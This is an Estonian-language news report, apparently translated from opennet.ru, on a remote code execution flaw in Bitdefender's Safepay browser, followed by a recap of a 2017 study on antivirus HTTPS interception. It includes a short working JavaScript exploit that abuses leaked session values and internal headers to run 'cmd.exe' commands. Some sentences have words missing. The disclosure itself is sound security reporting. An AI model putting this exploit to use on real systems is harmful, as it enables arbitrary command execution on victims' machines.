Vladimir Palant, Adblock Plus'i looja, () Chromiumi mootori põhjal loodud spetsialiseeritud veebibrauseris Safepay, mis on osa Bitdefender Total Security 2020 viirusetõrje paketist ja mille eesmärk on suurendada kasutaja tööohutust globaalses võrgus (näiteks pakutakse täiendavat isolatsiooni sissetulekute ja maksesüsteemide käsitlemisel). Turvaviga võimaldab avatud veebilehtedel brauseris käivitada juhuslikku koodi operatsioonisüsteemi tasemel.
Probleemi põhjuseks on see, et Bitdefenderi viirusetõrje teostab kohaliku HTTPS-liikluse ülevõtmist, asendades veebisaidi originaalse TLS-sertifikaadi. Klientide süsteemidesse installitakse täiendav juursertifikaat, mis võimaldab varjata rakendatava liikluse inspektsiooni töötamist. Viirusetõrje sekkub kaitstud liiklusesse ja sisestab teatud lehtedele oma JavaScript-koodi Safe Search'i funktsiooni rakendamiseks ning sertifikaadi probleemide korral asendab väljastatud vealehe oma kohandatud versiooniga. Kuna uus vealeht väljastatakse avatud serveri nimel, on selle serveri teistel lehtedel täielik juurdepääs Bitdefenderi sisestatud sisule.
Rünnatava isiku kontrollitava saidi avamisel võib see sait saata XMLHttpRequesti päringu ja simuleerida HTTPS-sertifikaadiga seotud probleeme, mis toob kaasa Bitdefenderi kohandatud vealehe tagasisaatmise. Kuna vealeht avatakse ründaja domeeni kontekstis, saab ründaja lugeda kohandatud lehe sisu Bitdefenderi parameetritega. Bitdefenderi sisestatud lehel on ka sessioonivõti, mis võimaldab Bitdefenderi sise-API kaudu käivitada eraldi Safepay brauseri seansi, määrates seejuures juhuslikud käsurea lipud ning käivitada mis tahes süsteemi käsud, kasutades lipu „—utility-cmd-prefix“. Näide eksploidist (param1 ja param2 – väärtused, mis on saadud vealehelt):
var request = new XMLHttpRequest();
request.open(‘POST’, Math.random());
request.setRequestHeader(‘Content-type’, ‘application/x-www-form-urlencoded’);
request.setRequestHeader(‘BDNDSS_B67EA559F21B487F861FDA8A44F01C50’, param1);
request.setRequestHeader(‘BDNDCA_BBACF84D61A04F9AA66019A14B035478’, param2);
request.setRequestHeader(‘BDNDWB_5056E556833D49C1AF4085CB254FC242’, ‘obk.run’);
request.setRequestHeader(‘BDNDOK_4E961A95B7B44CBCA1907D3D3643370D’, location.href);
request.send(‘data:text/html,nada —utility-cmd-prefix=\”cmd.exe /k whoami & echo\”’);
Tuletame meelde, et 2017. aastal läbi viidud uuring , et 24 26-st testitud viirusetõrjetootest, mis inspekteerivad HTTPS-liiklust sertifikaatide asendamise kaudu, langetavad HTTPS-ühenduse üldist turvalisuse taset.
Praegused krüptograafia komplektid osutusid kätte vaid 11 26-st tootest. 5 süsteemi ei kinnitanud sertifikaate (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security ja Total Security tooted olid rünnete suhtes haavatavad , samas kui AVG, Bitdefender ja Bullguard tooted olid rünnete suhtes ja . Toode Dr.Web Antivirus 11 võimaldab tagasi minna usaldamatutele eksportkrüpteerimise meetoditele (rünne ).
Allikas: opennet.ru
